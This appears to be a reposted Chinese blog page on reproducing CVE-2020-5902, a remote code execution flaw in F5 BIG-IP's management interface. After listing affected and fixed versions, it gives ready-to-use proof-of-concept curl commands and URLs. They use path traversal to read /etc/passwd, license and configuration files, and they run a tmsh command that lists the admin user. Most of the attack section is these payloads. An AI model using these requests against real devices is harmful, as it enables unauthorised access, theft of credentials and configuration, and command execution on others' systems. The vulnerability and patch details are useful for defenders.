cve-2020-5902 BIG-IP RCE漏洞复现&exp
Posted potatsosec
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了cve-2020-5902 BIG-IP RCE漏洞复现&exp相关的知识,希望对你有一定的参考价值。
简介
BIG-IP的TMUI存在RCE漏洞
影响范围
版本号主要如下
11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x
修复方法
升级
11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4
文件读取poc
curl -v -k ‘https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd‘
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
RCE poc
curl -v -k ‘https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin‘
参考
以上是关于cve-2020-5902 BIG-IP RCE漏洞复现&exp的主要内容,如果未能解决你的问题,请参考以下文章
F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)
14-PHP代码审计——ThinkPHP5.0.23 RCE漏洞分析